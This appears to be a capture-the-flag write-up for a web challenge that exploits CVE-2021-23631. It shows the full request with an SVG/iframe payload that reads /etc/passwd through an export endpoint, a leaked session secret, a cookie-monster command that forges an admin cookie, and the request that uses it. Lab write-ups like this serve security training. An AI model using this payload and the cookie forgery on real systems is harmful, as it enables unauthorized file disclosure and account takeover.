Tags: cve-2021-23631 cookie
Rating: 2.0
Found a way to read a local file through the SVG-to-PNG export (LFI, CVE-2021-23631):
```
POST /api/export HTTP/1.1
Host: 138.68.175.87:30484
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://138.68.175.87:30484/dashboard
Content-Type: application/json
Origin: http://138.68.175.87:30484
Content-Length: 283
DNT: 1
Connection: close
Cookie: session.sig=4u6WkhlFO5u5hCXaxOP-HGYLD9s; session=eyJ1c2VybmFtZSI6InRlc3QyIn0=
{"svg":"`<svg-dummy></svg-dummy><iframe src=\"file:///etc/passwd\" width=\"100%\" height=\"1000px\"></iframe><svg viewBox=\"0 0 240 80\" height=\"1000\" width=\"1000\" xmlns=\"http://www.w3.org/2000/svg\"><text x=\"0\" y=\"0\" class=\"Rrrrr\" id=\"demo\">data</text></svg>`"}
```
Got the secret used to sign/verify the session cookie from /app/.env:
`SESSION_SECRET_KEY=5921719c3037662e94250307ec5ed1db`
Used cookie-monster to generate the cookie:
```
root@sd-127123:/tmp# cat test.json
{"username":"admin"}
root@sd-127123:/tmp# cookie-monster -e -f test.json -k 5921719c3037662e94250307ec5ed1db
[+] Data Cookie: session=eyJ1c2VybmFtZSI6ImFkbWluIn0=
[+] Signature Cookie: session.sig=EYdvy2mhVoEznETyhYjNYFFZM8o
```
Burp repeater:
```
GET /dashboard HTTP/1.1
Host: 138.68.150.120:31876
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://138.68.150.120:31876/
DNT: 1
Connection: close
Cookie: session=eyJ1c2VybmFtZSI6ImFkbWluIn0=; session.sig=EYdvy2mhVoEznETyhYjNYFFZM8o
Upgrade-Insecure-Requests: 1
```
The flag is in the source of the response:
`var flag = 'HTB{ZZZZZZZZZZZZZZZZZZZZZZ}'`